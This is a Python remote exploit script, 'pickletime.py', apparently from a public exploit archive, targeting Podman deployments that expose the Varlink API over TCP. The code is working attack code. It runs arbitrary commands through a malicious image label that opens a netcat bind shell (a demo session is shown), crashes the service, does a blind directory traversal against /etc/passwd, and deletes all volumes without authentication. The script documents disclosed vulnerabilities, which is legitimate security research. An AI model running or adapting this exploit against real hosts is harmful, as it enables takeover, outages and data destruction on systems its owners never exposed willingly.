Remote exploit for Podman when configured with Varlink that allows for remote command execution, denial of service, directory traversal, and information disclosure vulnerabilities.
877a6bf3a116aaaf342e4d3eba5c9537#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# pickletime.py
#
# Podman + Varlink Insecure Config Remote Exploit
#
# Jeremy Brown [jbrown3264/gmail] @ Oct 2019
#
# -------
# Details
# -------
#
# Podman is container engine / platform similar to Docker supported
# by RedHat and Fedora with Varlink being a protocol to exchange
# messages, which comes in handy for things like a Remote API.
#
# Now depending on how Podman and Varlink are deployed, they can be
# susceptible to local and remote attacks. There are a few API bugs
# in Podman itself, as well as a way to execute arbitary commands if
# one can hit Podman via the Remote API. Running Podman with Varlink
# over tcp listening either on localhost or the network interface is the
# most vulnerable setup, but other ways such as access via the local UNIX
# socket or over SSH (key /w no passphrase is common) aren't likely
# to be vulnerable unless ACLs or other stuff is broken.
#
# ------------------
# Testing the issues
# ------------------
#
# - check; just connects and issues GetInfo() to see if the host is
# running a podman service
#
# - exec; arbitrary cmd execution via ContainerRunlabel() specified
# by "run" label in the specified hosted image (self-setup)
#
# - dos; crash the server via choosing a /random/ selection from
# the available parsing bugs in APIs (we like to have fun here)
#
# - blind; dir traversal in SearchImages() API to force server to
# read an arbitrary file (no client-side output)
#
# - volrm; loops to remove all volumes via VolumeRemove() behavior
#
# ---------
# Exec demo
# ---------
#
# $ ./pickletime.py check podman-host:6000
# -> Podman service confirmed on host
#
# Then create a Dockerfile with an edgy label, build and host it.
#
# [Dockerfile]
# FROM busybox
# LABEL run=“nc -l -p 10000 -e /bin/bash”
#
# $ ./pickletime.py exec podman-host:6000 docker-registry:5000/image run
# Done!
#
# $ nc podman-host 10000
# ps
# PID TTY TIME CMD
# 111640 pts/1 00:00:00 bash
# 111786 pts/1 00:00:00 podman
# 111797 pts/1 00:00:00 nc
# 111799 pts/1 00:00:00 bash
# 111801 pts/1 00:00:00 ps
#
#
# Tested Podman 1.4.4/1.5.1 and Varlink 18 on Fedora Server 30 x64
#
# -----------
# Other stuff
# -----------
#
# Note: admins can really setup their connection and deployment configuration
# however they like, so it's hard to say how many folks are 'doing it wrong'
# or actually are running with proper auth and hardening in place. Shodan
# folks have been contacted about adding support to discover Varlink services
# to get more data that way as well.
#
# Fixed bugs:
# - DoS #2 was fixed in 1.5.1
# - Updated security docs / cli flags TBD
#
# > Why pickles? Why not.
#
# Dependencies to run this code:
#
# sudo dnf install -y python3-podman-api
#
#
#
import os
import sys
import socket
import subprocess
import random
import json
import podman
import pickle
import time
serviceName = 'io.podman' # service name
def main():
if(len(sys.argv) < 2):
print("Usage: %s <action> <host> [action....params]\n" % sys.argv[0])
print("Eg: %s check tcp:podman-host:6000" % sys.argv[0])
print("... %s exec tcp:podman-host:6000 docker-registry:5000/image run\n" % sys.argv[0])
print("Actions: check, exec, dos, blind, volrm\n")
return
action = sys.argv[1]
address = sys.argv[2] # eg. unix:/run/podman/io.podman for local testing
ip = address.split(':')[1]
port = int(address.split(':')[2])
if(action == 'exec'):
if(len(sys.argv) < 4):
print("Error: need more args for exec")
return
image = sys.argv[3] # 'source' for pull
label = sys.argv[4]
isItTime()
try:
pman = podman.Client(uri=address)
except Exception:
print("Error: can't connect to host")
return
if(action == 'check'):
result = json.dumps(pman.system.info())
if('podman_version' in result):
print("-> Podman service confirmed on host")
return
print("-!- Podman service was not found on host")
elif(action == 'exec'):
#
# First pull the image from the repo, then run the label
#
try:
result = pman.images.pull(image) # PullImage()
except Exception as error:
pass # call fails sometimes if image already exists which is *ok*
#
# ContainerRunlabel() ... but, no library imp. we'll do it live!
#
method = serviceName + '.' + 'ContainerRunlabel'
message = '{\"method\":\"'
message += method
message += '\",\"parameters\":'
message += '{\"Runlabel\":{\"image\":\"'
message += image
message += '\",\"label\":\"'
message += label
message += '\"}}}'
message += '\0' # end each msg with a NULL byte
doSocketSend(ip, port, message)
elif(action == 'dos'):
#bug = 1 # !fun
bug = random.randint(1,2) # fun
if(bug == 1):
print("one")
source = 'test'
method = serviceName + '.' + 'LoadImage'
message = '{\"method\":\"'
message += method
message += '\",\"parameters\":'
message += '{\"source":\"'
message += source
message += '\"}}'
message += '\0'
doSocketSend(ip, port, message)
# works on 1.4.4, fixed in 1.5.1
if(bug == 2):
print("two")
reference = 'b' * 238
source = '/dev/null' # this file must exist locally
method = serviceName + '.' + 'ImportImage'
message = '{\"method\":\"'
message += method
message += '\",\"parameters\":'
message += '{\"reference\":\"'
message += reference
message += '\",\"source\":\"'
message += source
message += '\"}}'
message += '\0'
doSocketSend(ip, port, message)
#
# blind read of arbitrary files server-side
# ...interesting but not particularly useful by itself
#
# openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 7
# lseek(7, 0, SEEK_CUR) = 0
# fstat(7, {st_mode=S_IFREG|0644, st_size=1672, ...}) = 0
# read(7, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1672
# close(7)
#
elif(action == 'blind'):
method = serviceName + '.' + 'SearchImages'
query = '../../../etc/passwd/' # magic '/' at the end
message = '{\"method\":\"'
message += method
message += '\",\"parameters\":'
message += '{\"query\":\"'
message += query
message += '\"}}'
message += '\0'
#pman.images.search(query) # unclear why this doesn't work
doSocketSend(ip, port, message)
#
# Not really a bug, but an interesting feature to demo without auth
# note: call CreateVolume() a few times beforehand to test the removal
#
elif(action == 'volrm'):
method = serviceName + '.' + 'VolumeRemove'
n = 10 # this is probably enough to test, but change as necessary
message = '{\"method\":\"'
message += method
message += '\",\"parameters\":'
message += '{\"options\":{\"volumes\":[\"\"]}}}' # empty = alphabetical removal
message += '\0'
for _ in range(n):
doSocketSend(ip, port, message)
time.sleep(0.5) # server processing time
print("Done!")
#
# podman/varlink libaries don't support calling these API calls, so native we must
#
def doSocketSend(ip, port, message):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
sock.send(message.encode())
except Exception as error:
print(str(error))
return
finally:
sock.close()
#
# obligatory routine
#
def isItTime():
tm = time.localtime()
p = pickle.dumps('it\'s pickle time!')
if((str(tm.tm_hour) == '11') and (str(tm.tm_min) == '11')):
print(pickle.loads(p))
else:
pass # no dill
if(__name__ == '__main__'):
main()